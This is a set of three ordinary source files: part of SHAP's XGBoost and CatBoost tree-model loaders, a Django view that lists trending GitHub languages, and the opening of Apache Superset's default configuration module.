node_sample_weight_val = float(value.split("cover=")[1].split(",")[0])
children_left[key] = c_left
children_right[key] = c_right
children_default[key] = c_default
features[key] = feature
thresholds[key] = threshold
node_sample_weight[key] = node_sample_weight_val
self.children_left = children_left
self.children_right = children_right
self.children_default = children_default
self.features = features
self.thresholds = thresholds
self.values = values[:,np.newaxis] * scaling
self.node_sample_weight = node_sample_weight
else:
raise Exception("Unknown input to Tree constructor!")
# Re-compute the number of samples that pass through each node if we are given data
if data is not None and data_missing is not None:
self.node_sample_weight[:] = 0.0
_cext.dense_tree_update_weights(
self.children_left, self.children_right, self.children_default, self.features,
self.thresholds, self.values, 1, self.node_sample_weight, data, data_missing
)
# we compute the expectations to make sure they follow the SHAP logic
self.max_depth = _cext.compute_expectations(
self.children_left, self.children_right, self.node_sample_weight,
self.values
)
def get_xgboost_json(model):
""" This gets a JSON dump of an XGBoost model while ensuring the features names are their indexes.
"""
fnames = model.feature_names
model.feature_names = None
json_trees = model.get_dump(with_stats=True, dump_format="json")
model.feature_names = fnames
# this fixes a bug where XGBoost can return invalid JSON
json_trees = [t.replace(": inf,", ": 1000000000000.0,") for t in json_trees]
json_trees = [t.replace(": -inf,", ": -1000000000000.0,") for t in json_trees]
return json_trees
class XGBTreeModelLoader(object):
""" This loads an XGBoost model directly from a raw memory dump.
We can't use the JSON dump because due to numerical precision issues those
tree can actually be wrong when feature values land almost on a threshold.
"""
def __init__(self, xgb_model):
self.buf = xgb_model.save_raw()
self.pos = 0
# load the model parameters
self.base_score = self.read('f')
self.num_feature = self.read('I')
self.num_class = self.read('i')
self.contain_extra_attrs = self.read('i')
self.contain_eval_metrics = self.read('i')
self.read_arr('i', 29) # reserved
self.name_obj_len = self.read('Q')
self.name_obj = self.read_str(self.name_obj_len)
self.name_gbm_len = self.read('Q')
self.name_gbm = self.read_str(self.name_gbm_len)
assert self.name_gbm == "gbtree", "Only the 'gbtree' model type is supported, not '%s'!" % self.name_gbm
# load the gbtree specific parameters
self.num_trees = self.read('i')
self.num_roots = self.read('i')
self.num_feature = self.read('i')
self.pad_32bit = self.read('i')
self.num_pbuffer_deprecated = self.read('Q')
self.num_output_group = self.read('i')
self.size_leaf_vector = self.read('i')
self.read_arr('i', 32) # reserved
# load each tree
self.num_roots = np.zeros(self.num_trees, dtype=np.int32)
self.num_nodes = np.zeros(self.num_trees, dtype=np.int32)
self.num_deleted = np.zeros(self.num_trees, dtype=np.int32)
self.max_depth = np.zeros(self.num_trees, dtype=np.int32)
self.num_feature = np.zeros(self.num_trees, dtype=np.int32)
self.size_leaf_vector = np.zeros(self.num_trees, dtype=np.int32)
self.node_parents = []
self.node_cleft = []
self.node_cright = []
self.node_sindex = []
self.node_info = []
self.loss_chg = []
self.sum_hess = []
self.base_weight = []
self.leaf_child_cnt = []
for i in range(self.num_trees):
# load the per-tree params
self.num_roots[i] = self.read('i')
self.num_nodes[i] = self.read('i')
self.num_deleted[i] = self.read('i')
self.max_depth[i] = self.read('i')
self.num_feature[i] = self.read('i')
self.size_leaf_vector[i] = self.read('i')
# load the nodes
self.read_arr('i', 31) # reserved
self.node_parents.append(np.zeros(self.num_nodes[i], dtype=np.int32))
self.node_cleft.append(np.zeros(self.num_nodes[i], dtype=np.int32))
self.node_cright.append(np.zeros(self.num_nodes[i], dtype=np.int32))
self.node_sindex.append(np.zeros(self.num_nodes[i], dtype=np.uint32))
self.node_info.append(np.zeros(self.num_nodes[i], dtype=np.float32))
for j in range(self.num_nodes[i]):
self.node_parents[-1][j] = self.read('i')
self.node_cleft[-1][j] = self.read('i')
self.node_cright[-1][j] = self.read('i')
self.node_sindex[-1][j] = self.read('I')
self.node_info[-1][j] = self.read('f')
# print("self.node_cleft[-1][%d]" % j, self.node_cleft[-1][j])
# print("self.node_cright[-1][%d]" % j, self.node_cright[-1][j])
# print("self.node_sindex[-1][%d]" % j, self.node_sindex[-1][j])
# print("self.node_info[-1][%d]" % j, self.node_info[-1][j])
# print()
# load the stat nodes
self.loss_chg.append(np.zeros(self.num_nodes[i], dtype=np.float32))
self.sum_hess.append(np.zeros(self.num_nodes[i], dtype=np.float32))
self.base_weight.append(np.zeros(self.num_nodes[i], dtype=np.float32))
self.leaf_child_cnt.append(np.zeros(self.num_nodes[i], dtype=np.int))
for j in range(self.num_nodes[i]):
self.loss_chg[-1][j] = self.read('f')
self.sum_hess[-1][j] = self.read('f')
self.base_weight[-1][j] = self.read('f')
self.leaf_child_cnt[-1][j] = self.read('i')
# print("self.loss_chg[-1][%d]" % j, self.loss_chg[-1][j])
# print("self.sum_hess[-1][%d]" % j, self.sum_hess[-1][j])
# print("self.base_weight[-1][%d]" % j, self.base_weight[-1][j])
# print("self.leaf_child_cnt[-1][%d]" % j, self.leaf_child_cnt[-1][j])
# print()
def get_trees(self, data=None, data_missing=None):
shape = (self.num_trees, self.num_nodes.max())
self.children_default = np.zeros(shape, dtype=np.int)
self.features = np.zeros(shape, dtype=np.int)
self.thresholds = np.zeros(shape, dtype=np.float32)
self.values = np.zeros((shape[0], shape[1], 1), dtype=np.float32)
trees = []
for i in range(self.num_trees):
for j in range(self.num_nodes[i]):
if np.right_shift(self.node_sindex[i][j], np.uint32(31)) != 0:
self.children_default[i,j] = self.node_cleft[i][j]
else:
self.children_default[i,j] = self.node_cright[i][j]
self.features[i,j] = self.node_sindex[i][j] & ((np.uint32(1) << np.uint32(31)) - np.uint32(1))
if self.node_cleft[i][j] >= 0:
self.thresholds[i,j] = self.node_info[i][j]
else:
self.values[i,j] = self.node_info[i][j]
l = len(self.node_cleft[i])
trees.append(Tree({
"children_left": self.node_cleft[i],
"children_right": self.node_cright[i],
"children_default": self.children_default[i,:l],
"feature": self.features[i,:l],
"threshold": self.thresholds[i,:l],
"value": self.values[i,:l],
"node_sample_weight": self.sum_hess[i]
}, data=data, data_missing=data_missing))
return trees
def read(self, dtype):
size = struct.calcsize(dtype)
val = struct.unpack(dtype, self.buf[self.pos:self.pos+size])[0]
self.pos += size
return val
def read_arr(self, dtype, n_items):
format = "%d%s" % (n_items, dtype)
size = struct.calcsize(format)
val = struct.unpack(format, self.buf[self.pos:self.pos+size])[0]
self.pos += size
return val
def read_str(self, size):
val = self.buf[self.pos:self.pos+size].decode('utf-8')
self.pos += size
return val
def print_info(self):
print("--- global parmeters ---")
print("base_score =", self.base_score)
print("num_feature =", self.num_feature)
print("num_class =", self.num_class)
print("contain_extra_attrs =", self.contain_extra_attrs)
print("contain_eval_metrics =", self.contain_eval_metrics)
print("name_obj_len =", self.name_obj_len)
print("name_obj =", self.name_obj)
print("name_gbm_len =", self.name_gbm_len)
print("name_gbm =", self.name_gbm)
print()
print("--- gbtree specific parameters ---")
print("num_trees =", self.num_trees)
print("num_roots =", self.num_roots)
print("num_feature =", self.num_feature)
print("pad_32bit =", self.pad_32bit)
print("num_pbuffer_deprecated =", self.num_pbuffer_deprecated)
print("num_output_group =", self.num_output_group)
print("size_leaf_vector =", self.size_leaf_vector)
class CatBoostTreeModelLoader:
def __init__(self, cb_model):
cb_model.save_model("cb_model.json", format="json")
self.loaded_cb_model = json.load(open("cb_model.json", "r"))
# load the CatBoost oblivious trees specific parameters
self.num_trees = self.loaded_cb_model['model_info']['params']['boosting_options']['iterations']
self.max_depth = self.loaded_cb_model['model_info']['params']['tree_learner_options']['depth']
def get_trees(self, data=None, data_missing=None):
# load each tree
trees = []
for tree_index in range(self.num_trees):
# load the per-tree params
depth = len(self.loaded_cb_model['oblivious_trees'][tree_index]['splits'])
# load the nodes
# Re-compute the number of samples that pass through each node if we are given data
leaf_weights = self.loaded_cb_model['oblivious_trees'][tree_index]['leaf_weights']
leaf_weights_unraveled = [0] * (len(leaf_weights) - 1) + leaf_weights
leaf_weights_unraveled[0] = sum(leaf_weights)
for index in range(len(leaf_weights) - 2, 0, -1):
leaf_weights_unraveled[index] = leaf_weights_unraveled[2 * index + 1] + leaf_weights_unraveled[2 * index + 2]
leaf_values = self.loaded_cb_model['oblivious_trees'][tree_index]['leaf_values']
leaf_values_unraveled = [0] * (len(leaf_values) - 1) + leaf_values
children_left = [i * 2 + 1 for i in range(len(leaf_values) - 1)]
children_left += [-1] * len(leaf_values)
children_right = [i * 2 for i in range(1, len(leaf_values))]
children_right += [-1] * len(leaf_values)
children_default = [i * 2 + 1 for i in range(len(leaf_values) - 1)]
children_default += [-1] * len(leaf_values)
# load the split features and borders
# split features and borders go from leafs to the root
split_features_index = []
borders = []
# split features and borders go from leafs to the root
for elem in self.loaded_cb_model['oblivious_trees'][tree_index]['splits']:
split_features_index.append(elem['float_feature_index'])
borders.append(elem['border'])
split_features_index_unraveled = []
for counter, feature_index in enumerate(split_features_index[::-1]):
split_features_index_unraveled += [feature_index] * (2 ** counter)
split_features_index_unraveled += [0] * len(leaf_values)
borders_unraveled = []
for counter, border in enumerate(borders[::-1]):
borders_unraveled += [border] * (2 ** counter)
borders_unraveled += [0] * len(leaf_values)
trees.append(Tree({"children_left": np.array(children_left),
"children_right": np.array(children_right),
"children_default": np.array(children_default),
"feature": np.array(split_features_index_unraveled),
"threshold": np.array(borders_unraveled),
"value": np.array(leaf_values_unraveled).reshape((-1,1)),
"node_sample_weight": np.array(leaf_weights_unraveled),
}, data=data, data_missing=data_missing))
return trees
|
the-stack_106_19040
|
import requests
from django.shortcuts import render, redirect
from django.http import HttpResponse
from datetime import datetime, timedelta
#from django.http import JsonResponse
import json
# Create your views here.
def trending_lang(request):
time_now = datetime.now()
last_month = (time_now - timedelta(days=30)).strftime("%Y-%m-%d")
url = "https://api.github.com/search/repositories?q=created:>{0}&sort=stars&order=desc&page=1&per_page=100".format(last_month)
data=requests.get(url).json()
languages = {element['language'] for element in data['items'] if element['language'] != None}
response_object = {
"languages_num" : len(languages),
"incomplete_results": data['incomplete_results'],
"languages" : []
}
for language in languages:
language_repos = get_lagugage_repos(language, data['items'])
response_object['languages'].append({
"name" : language,
"repositories_count" : len(language_repos),
"repositories" : language_repos
})
return HttpResponse(json.dumps(response_object), content_type="application/json")
def get_lagugage_repos(language, repositories):
'''
Parameters:
repositories (string): repositories list
language (string): languages name
Return:
list of repos for specific language
'''
repos = []
for repo in repositories:
if repo['language'] == language:
# construct repo with information we need
repo_info = {
"repo_name" : repo['name'],
"repo_url" : repo['html_url'],
"stars_count" : repo['stargazers_count']
}
repos.append(repo_info)
return repos
|
the-stack_106_19041
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""The main config file for Superset
All configuration in this file can be overridden by providing a superset_config
in your PYTHONPATH as there is a ``from superset_config import *``
at the end of this file.
"""
import imp
import importlib.util
import json
import logging
import os
import sys
from collections import OrderedDict
from datetime import date
from typing import Any, Callable, Dict, List, Optional, Type, TYPE_CHECKING
from cachelib.base import BaseCache
from celery.schedules import crontab
from dateutil import tz
from flask import Blueprint
from flask_appbuilder.security.manager import AUTH_DB
from pandas.io.parsers import STR_NA_VALUES
from superset.jinja_context import ( # pylint: disable=unused-import
BaseTemplateProcessor,
)
from superset.stats_logger import DummyStatsLogger
from superset.typing import CacheConfig
from superset.utils.core import is_test
from superset.utils.log import DBEventLogger
from superset.utils.logging_configurator import DefaultLoggingConfigurator
logger = logging.getLogger(__name__)
if TYPE_CHECKING:
from flask_appbuilder.security.sqla import models # pylint: disable=unused-import
from superset.models.core import Database # pylint: disable=unused-import
# Realtime stats logger, a StatsD implementation exists
STATS_LOGGER = DummyStatsLogger()
EVENT_LOGGER = DBEventLogger()
SUPERSET_LOG_VIEW = True
BASE_DIR = os.path.abspath(os.path.dirname(__file__))
if "SUPERSET_HOME" in os.environ:
DATA_DIR = os.environ["SUPERSET_HOME"]
else:
DATA_DIR = os.path.join(os.path.expanduser("~"), ".superset")
# ---------------------------------------------------------
# Superset specific config
# ---------------------------------------------------------
VERSION_INFO_FILE = os.path.join(BASE_DIR, "static", "version_info.json")
PACKAGE_JSON_FILE = os.path.join(BASE_DIR, "static", "assets", "package.json")
# Multiple favicons can be specified here. The "href" property
# is mandatory, but "sizes," "type," and "rel" are optional.
# For example:
# {
# "href":path/to/image.png",
# "sizes": "16x16",
# "type": "image/png"
# "rel": "icon"
# },
FAVICONS = [{"href": "/static/assets/images/favicon.png"}]
def _try_json_readversion(filepath: str) -> Optional[str]:
try:
with open(filepath, "r") as f:
return json.load(f).get("version")
except Exception: # pylint: disable=broad-except
return None
def _try_json_readsha( # pylint: disable=unused-argument
filepath: str, length: int
) -> Optional[str]:
try:
with open(filepath, "r") as f:
return json.load(f).get("GIT_SHA")[:length]
except Exception: # pylint: disable=broad-except
return None
# Depending on the context in which this config is loaded, the
# version_info.json file may or may not be available, as it is
# generated on install via setup.py. In the event that we're
# actually running Superset, we will have already installed,
# therefore it WILL exist. When unit tests are running, however,
# it WILL NOT exist, so we fall back to reading package.json
VERSION_STRING = _try_json_readversion(VERSION_INFO_FILE) or _try_json_readversion(
PACKAGE_JSON_FILE
)
VERSION_SHA_LENGTH = 8
VERSION_SHA = _try_json_readsha(VERSION_INFO_FILE, VERSION_SHA_LENGTH)
ROW_LIMIT = 50000
VIZ_ROW_LIMIT = 10000
# max rows retreieved when requesting samples from datasource in explore view
SAMPLES_ROW_LIMIT = 1000
# max rows retrieved by filter select auto complete
FILTER_SELECT_ROW_LIMIT = 10000
SUPERSET_WORKERS = 2 # deprecated
SUPERSET_CELERY_WORKERS = 32 # deprecated
SUPERSET_WEBSERVER_PROTOCOL = "http"
SUPERSET_WEBSERVER_ADDRESS = "0.0.0.0"
SUPERSET_WEBSERVER_PORT = 8088
# This is an important setting, and should be lower than your
# [load balancer / proxy / envoy / kong / ...] timeout settings.
# You should also make sure to configure your WSGI server
# (gunicorn, nginx, apache, ...) timeout setting to be <= to this setting
SUPERSET_WEBSERVER_TIMEOUT = 60
# this 2 settings are used by dashboard period force refresh feature
# When user choose auto force refresh frequency
# < SUPERSET_DASHBOARD_PERIODICAL_REFRESH_LIMIT
# they will see warning message in the Refresh Interval Modal.
# please check PR #9886
SUPERSET_DASHBOARD_PERIODICAL_REFRESH_LIMIT = 0
SUPERSET_DASHBOARD_PERIODICAL_REFRESH_WARNING_MESSAGE = None
SUPERSET_DASHBOARD_POSITION_DATA_LIMIT = 65535
CUSTOM_SECURITY_MANAGER = None
SQLALCHEMY_TRACK_MODIFICATIONS = False
# ---------------------------------------------------------
# Your App secret key
SECRET_KEY = "\2\1thisismyscretkey\1\2\\e\\y\\y\\h"
# The SQLAlchemy connection string.
SQLALCHEMY_DATABASE_URI = "sqlite:///" + os.path.join(DATA_DIR, "superset.db")
# SQLALCHEMY_DATABASE_URI = 'mysql://myapp@localhost/myapp'
# SQLALCHEMY_DATABASE_URI = 'postgresql://root:password@localhost/myapp'
# In order to hook up a custom password store for all SQLACHEMY connections
# implement a function that takes a single argument of type 'sqla.engine.url',
# returns a password and set SQLALCHEMY_CUSTOM_PASSWORD_STORE.
#
# e.g.:
# def lookup_password(url):
# return 'secret'
# SQLALCHEMY_CUSTOM_PASSWORD_STORE = lookup_password
SQLALCHEMY_CUSTOM_PASSWORD_STORE = None
# The limit of queries fetched for query search
QUERY_SEARCH_LIMIT = 1000
# Flask-WTF flag for CSRF
WTF_CSRF_ENABLED = True
# Add endpoints that need to be exempt from CSRF protection
WTF_CSRF_EXEMPT_LIST = ["superset.views.core.log", "superset.charts.api.data"]
# Whether to run the web server in debug mode or not
DEBUG = os.environ.get("FLASK_ENV") == "development"
FLASK_USE_RELOAD = True
# Superset allows server-side python stacktraces to be surfaced to the
# user when this feature is on. This may has security implications
# and it's more secure to turn it off in production settings.
SHOW_STACKTRACE = True
# Use all X-Forwarded headers when ENABLE_PROXY_FIX is True.
# When proxying to a different port, set "x_port" to 0 to avoid downstream issues.
ENABLE_PROXY_FIX = False
PROXY_FIX_CONFIG = {"x_for": 1, "x_proto": 1, "x_host": 1, "x_port": 1, "x_prefix": 1}
# ------------------------------
# GLOBALS FOR APP Builder
# ------------------------------
# Uncomment to setup Your App name
APP_NAME = "Superset"
# Uncomment to setup an App icon
APP_ICON = "/static/assets/images/superset-logo-horiz.png"
APP_ICON_WIDTH = 126
# Uncomment to specify where clicking the logo would take the user
# e.g. setting it to '/welcome' would take the user to '/superset/welcome'
LOGO_TARGET_PATH = None
# Enables SWAGGER UI for superset openapi spec
# ex: http://localhost:8080/swagger/v1
FAB_API_SWAGGER_UI = True
# Druid query timezone
# tz.tzutc() : Using utc timezone
# tz.tzlocal() : Using local timezone
# tz.gettz('Asia/Shanghai') : Using the time zone with specific name
# [TimeZone List]
# See: https://en.wikipedia.org/wiki/List_of_tz_database_time_zones
# other tz can be overridden by providing a local_config
DRUID_TZ = tz.tzutc()
DRUID_ANALYSIS_TYPES = ["cardinality"]
# Legacy Druid NoSQL (native) connector
# Druid supports a SQL interface in its newer versions.
# Setting this flag to True enables the deprecated, API-based Druid
# connector. This feature may be removed at a future date.
DRUID_IS_ACTIVE = False
# If Druid is active whether to include the links to scan/refresh Druid datasources.
# This should be disabled if you are trying to wean yourself off of the Druid NoSQL
# connector.
DRUID_METADATA_LINKS_ENABLED = True
# ----------------------------------------------------
# AUTHENTICATION CONFIG
# ----------------------------------------------------
# The authentication type
# AUTH_OID : Is for OpenID
# AUTH_DB : Is for database (username/password)
# AUTH_LDAP : Is for LDAP
# AUTH_REMOTE_USER : Is for using REMOTE_USER from web server
AUTH_TYPE = AUTH_DB
# Uncomment to setup Full admin role name
# AUTH_ROLE_ADMIN = 'Admin'
# Uncomment to setup Public role name, no authentication needed
# AUTH_ROLE_PUBLIC = 'Public'
# Will allow user self registration
# AUTH_USER_REGISTRATION = True
# The default user self registration role
# AUTH_USER_REGISTRATION_ROLE = "Public"
# When using LDAP Auth, setup the LDAP server
# AUTH_LDAP_SERVER = "ldap://ldapserver.new"
# Uncomment to setup OpenID providers example for OpenID authentication
# OPENID_PROVIDERS = [
# { 'name': 'Yahoo', 'url': 'https://open.login.yahoo.com/' },
# { 'name': 'Flickr', 'url': 'https://www.flickr.com/<username>' },
# ---------------------------------------------------
# Roles config
# ---------------------------------------------------
# Grant public role the same set of permissions as for a selected builtin role.
# This is useful if one wants to enable anonymous users to view
# dashboards. Explicit grant on specific datasets is still required.
PUBLIC_ROLE_LIKE: Optional[str] = None
# ---------------------------------------------------
# Babel config for translations
# ---------------------------------------------------
# Setup default language
BABEL_DEFAULT_LOCALE = "en"
# Your application default translation path
BABEL_DEFAULT_FOLDER = "superset/translations"
# The allowed translation for you app
LANGUAGES = {
"en": {"flag": "us", "name": "English"},
"es": {"flag": "es", "name": "Spanish"},
"it": {"flag": "it", "name": "Italian"},
"fr": {"flag": "fr", "name": "French"},
"zh": {"flag": "cn", "name": "Chinese"},
"ja": {"flag": "jp", "name": "Japanese"},
"de": {"flag": "de", "name": "German"},
"pt": {"flag": "pt", "name": "Portuguese"},
"pt_BR": {"flag": "br", "name": "Brazilian Portuguese"},
"ru": {"flag": "ru", "name": "Russian"},
"ko": {"flag": "kr", "name": "Korean"},
}
# Turning off i18n by default as translation in most languages are
# incomplete and not well maintained.
LANGUAGES = {}
# ---------------------------------------------------
# Feature flags
# ---------------------------------------------------
# Feature flags that are set by default go here. Their values can be
# overwritten by those specified under FEATURE_FLAGS in super_config.py
# For example, DEFAULT_FEATURE_FLAGS = { 'FOO': True, 'BAR': False } here
# and FEATURE_FLAGS = { 'BAR': True, 'BAZ': True } in superset_config.py
# will result in combined feature flags of { 'FOO': True, 'BAR': True, 'BAZ': True }
DEFAULT_FEATURE_FLAGS: Dict[str, bool] = {
# Experimental feature introducing a client (browser) cache
"CLIENT_CACHE": False,
"ENABLE_EXPLORE_JSON_CSRF_PROTECTION": False,
"ENABLE_TEMPLATE_PROCESSING": False,
"KV_STORE": False,
"PRESTO_EXPAND_DATA": False,
# Exposes API endpoint to compute thumbnails
"THUMBNAILS": False,
"DASHBOARD_CACHE": False,
"REMOVE_SLICE_LEVEL_LABEL_COLORS": False,
"SHARE_QUERIES_VIA_KV_STORE": False,
"SIP_38_VIZ_REARCHITECTURE": False,
"TAGGING_SYSTEM": False,
"SQLLAB_BACKEND_PERSISTENCE": False,
"LISTVIEWS_DEFAULT_CARD_VIEW": False,
# Enables the replacement React views for all the FAB views (list, edit, show) with
# designs introduced in https://github.com/apache/incubator-superset/issues/8976
# (SIP-34). This is a work in progress so not all features available in FAB have
# been implemented.
"ENABLE_REACT_CRUD_VIEWS": True,
# When True, this flag allows display of HTML tags in Markdown components
"DISPLAY_MARKDOWN_HTML": True,
# When True, this escapes HTML (rather than rendering it) in Markdown components
"ESCAPE_MARKDOWN_HTML": False,
"SIP_34_ANNOTATIONS_UI": False,
"VERSIONED_EXPORT": False,
# Note that: RowLevelSecurityFilter is only given by default to the Admin role
# and the Admin Role does have the all_datasources security permission.
# But, if users create a specific role with access to RowLevelSecurityFilter MVC
# and a custom datasource access, the table dropdown will not be correctly filtered
# by that custom datasource access. So we are assuming a default security config,
# a custom security config could potentially give access to setting filters on
# tables that users do not have access to.
"ROW_LEVEL_SECURITY": False,
# Enables Alerts and reports new implementation
"ALERT_REPORTS": False,
"SIP_34_QUERY_SEARCH_UI": False,
}
# Set the default view to card/grid view if thumbnail support is enabled.
# Setting LISTVIEW_DEFAULT_CARD_VIEW to False will force the default view to
# always be the table layout
if DEFAULT_FEATURE_FLAGS["THUMBNAILS"]:
DEFAULT_FEATURE_FLAGS["LISTVIEW_DEFAULT_CARD_VIEW"] = True
# This is merely a default.
FEATURE_FLAGS: Dict[str, bool] = {}
# A function that receives a dict of all feature flags
# (DEFAULT_FEATURE_FLAGS merged with FEATURE_FLAGS)
# can alter it, and returns a similar dict. Note the dict of feature
# flags passed to the function is a deepcopy of the dict in the config,
# and can therefore be mutated without side-effect
#
# GET_FEATURE_FLAGS_FUNC can be used to implement progressive rollouts,
# role-based features, or a full on A/B testing framework.
#
# from flask import g, request
# def GET_FEATURE_FLAGS_FUNC(feature_flags_dict: Dict[str, bool]) -> Dict[str, bool]:
# if hasattr(g, "user") and g.user.is_active:
# feature_flags_dict['some_feature'] = g.user and g.user.id == 5
# return feature_flags_dict
GET_FEATURE_FLAGS_FUNC: Optional[Callable[[Dict[str, bool]], Dict[str, bool]]] = None
# ---------------------------------------------------
# Thumbnail config (behind feature flag)
# ---------------------------------------------------
THUMBNAIL_SELENIUM_USER = "Admin"
THUMBNAIL_CACHE_CONFIG: CacheConfig = {
"CACHE_TYPE": "null",
"CACHE_NO_NULL_WARNING": True,
}
# Used for thumbnails and other api: Time in seconds before selenium
# times out after trying to locate an element on the page and wait
# for that element to load for an alert screenshot.
SCREENSHOT_LOCATE_WAIT = 10
SCREENSHOT_LOAD_WAIT = 60
# ---------------------------------------------------
# Image and file configuration
# ---------------------------------------------------
# The file upload folder, when using models with files
UPLOAD_FOLDER = BASE_DIR + "/app/static/uploads/"
UPLOAD_CHUNK_SIZE = 4096
# The image upload folder, when using models with images
IMG_UPLOAD_FOLDER = BASE_DIR + "/app/static/uploads/"
# The image upload url, when using models with images
IMG_UPLOAD_URL = "/static/uploads/"
# Setup image size default is (300, 200, True)
# IMG_SIZE = (300, 200, True)
CACHE_DEFAULT_TIMEOUT = 60 * 60 * 24
CACHE_CONFIG: CacheConfig = {"CACHE_TYPE": "null"}
TABLE_NAMES_CACHE_CONFIG: CacheConfig = {"CACHE_TYPE": "null"}
DASHBOARD_CACHE_TIMEOUT = 60 * 60 * 24 * 365
# CORS Options
ENABLE_CORS = False
CORS_OPTIONS: Dict[Any, Any] = {}
# Chrome allows up to 6 open connections per domain at a time. When there are more
# than 6 slices in dashboard, a lot of time fetch requests are queued up and wait for
# next available socket. PR #5039 is trying to allow domain sharding for Superset,
# and this feature will be enabled by configuration only (by default Superset
# doesn't allow cross-domain request).
SUPERSET_WEBSERVER_DOMAINS = None
# Allowed format types for upload on Database view
EXCEL_EXTENSIONS = {"xlsx", "xls"}
CSV_EXTENSIONS = {"csv", "tsv", "txt"}
ALLOWED_EXTENSIONS = {*EXCEL_EXTENSIONS, *CSV_EXTENSIONS}
# CSV Options: key/value pairs that will be passed as argument to DataFrame.to_csv
# method.
# note: index option should not be overridden
CSV_EXPORT = {"encoding": "utf-8"}
# ---------------------------------------------------
# Time grain configurations
# ---------------------------------------------------
# List of time grains to disable in the application (see list of builtin
# time grains in superset/db_engine_specs.builtin_time_grains).
# For example: to disable 1 second time grain:
# TIME_GRAIN_DENYLIST = ['PT1S']
TIME_GRAIN_DENYLIST: List[str] = []
# Additional time grains to be supported using similar definitions as in
# superset/db_engine_specs.builtin_time_grains.
# For example: To add a new 2 second time grain:
# TIME_GRAIN_ADDONS = {'PT2S': '2 second'}
TIME_GRAIN_ADDONS: Dict[str, str] = {}
# Implementation of additional time grains per engine.
# The column to be truncated is denoted `{col}` in the expression.
# For example: To implement 2 second time grain on clickhouse engine:
# TIME_GRAIN_ADDON_EXPRESSIONS = {
# 'clickhouse': {
# 'PT2S': 'toDateTime(intDiv(toUInt32(toDateTime({col})), 2)*2)'
# }
# }
TIME_GRAIN_ADDON_EXPRESSIONS: Dict[str, Dict[str, str]] = {}
# ---------------------------------------------------
# List of viz_types not allowed in your environment
# For example: Disable pivot table and treemap:
# VIZ_TYPE_DENYLIST = ['pivot_table', 'treemap']
# ---------------------------------------------------
VIZ_TYPE_DENYLIST: List[str] = []
# ---------------------------------------------------
# List of data sources not to be refreshed in druid cluster
# ---------------------------------------------------
DRUID_DATA_SOURCE_DENYLIST: List[str] = []
# --------------------------------------------------
# Modules, datasources and middleware to be registered
# --------------------------------------------------
DEFAULT_MODULE_DS_MAP = OrderedDict(
[
("superset.connectors.sqla.models", ["SqlaTable"]),
("superset.connectors.druid.models", ["DruidDatasource"]),
]
)
ADDITIONAL_MODULE_DS_MAP: Dict[str, List[str]] = {}
ADDITIONAL_MIDDLEWARE: List[Callable[..., Any]] = []
# 1) https://docs.python-guide.org/writing/logging/
# 2) https://docs.python.org/2/library/logging.config.html
# Default configurator will consume the LOG_* settings below
LOGGING_CONFIGURATOR = DefaultLoggingConfigurator()
# Console Log Settings
LOG_FORMAT = "%(asctime)s:%(levelname)s:%(name)s:%(message)s"
LOG_LEVEL = "DEBUG"
# ---------------------------------------------------
# Enable Time Rotate Log Handler
# ---------------------------------------------------
# LOG_LEVEL = DEBUG, INFO, WARNING, ERROR, CRITICAL
ENABLE_TIME_ROTATE = False
TIME_ROTATE_LOG_LEVEL = "DEBUG"
FILENAME = os.path.join(DATA_DIR, "superset.log")
ROLLOVER = "midnight"
INTERVAL = 1
BACKUP_COUNT = 30
# Custom logger for auditing queries. This can be used to send ran queries to a
# structured immutable store for auditing purposes. The function is called for
# every query ran, in both SQL Lab and charts/dashboards.
# def QUERY_LOGGER(
# database,
# query,
# schema=None,
# user=None,
# client=None,
# security_manager=None,
# log_params=None,
# ):
# pass
QUERY_LOGGER = None
# Set this API key to enable Mapbox visualizations
MAPBOX_API_KEY = os.environ.get("MAPBOX_API_KEY", "")
# Maximum number of rows returned from a database
# in async mode, no more than SQL_MAX_ROW will be returned and stored
# in the results backend. This also becomes the limit when exporting CSVs
SQL_MAX_ROW = 100000
# Maximum number of rows displayed in SQL Lab UI
# Is set to avoid out of memory/localstorage issues in browsers. Does not affect
# exported CSVs
DISPLAY_MAX_ROW = 10000
# Default row limit for SQL Lab queries. Is overridden by setting a new limit in
# the SQL Lab UI
DEFAULT_SQLLAB_LIMIT = 1000
# Maximum number of tables/views displayed in the dropdown window in SQL Lab.
MAX_TABLE_NAMES = 3000
# Adds a warning message on sqllab save query and schedule query modals.
SQLLAB_SAVE_WARNING_MESSAGE = None
SQLLAB_SCHEDULE_WARNING_MESSAGE = None
# Default celery config is to use SQLA as a broker, in a production setting
# you'll want to use a proper broker as specified here:
# http://docs.celeryproject.org/en/latest/getting-started/brokers/index.html
class CeleryConfig: # pylint: disable=too-few-public-methods
BROKER_URL = "sqla+sqlite:///celerydb.sqlite"
CELERY_IMPORTS = ("superset.sql_lab", "superset.tasks")
CELERY_RESULT_BACKEND = "db+sqlite:///celery_results.sqlite"
CELERYD_LOG_LEVEL = "DEBUG"
CELERYD_PREFETCH_MULTIPLIER = 1
CELERY_ACKS_LATE = False
CELERY_ANNOTATIONS = {
"sql_lab.get_sql_results": {"rate_limit": "100/s"},
"email_reports.send": {
"rate_limit": "1/s",
"time_limit": 120,
"soft_time_limit": 150,
"ignore_result": True,
},
}
CELERYBEAT_SCHEDULE = {
"email_reports.schedule_hourly": {
"task": "email_reports.schedule_hourly",
"schedule": crontab(minute=1, hour="*"),
}
}
CELERY_CONFIG = CeleryConfig # pylint: disable=invalid-name
# Set celery config to None to disable all the above configuration
# CELERY_CONFIG = None
# Additional static HTTP headers to be served by your Superset server. Note
# Flask-Talisman applies the relevant security HTTP headers.
#
# DEFAULT_HTTP_HEADERS: sets default values for HTTP headers. These may be overridden
# within the app
# OVERRIDE_HTTP_HEADERS: sets override values for HTTP headers. These values will
# override anything set within the app
DEFAULT_HTTP_HEADERS: Dict[str, Any] = {}
OVERRIDE_HTTP_HEADERS: Dict[str, Any] = {}
HTTP_HEADERS: Dict[str, Any] = {}
# The db id here results in selecting this one as a default in SQL Lab
DEFAULT_DB_ID = None
# Timeout duration for SQL Lab synchronous queries
SQLLAB_TIMEOUT = 30
# Timeout duration for SQL Lab query validation
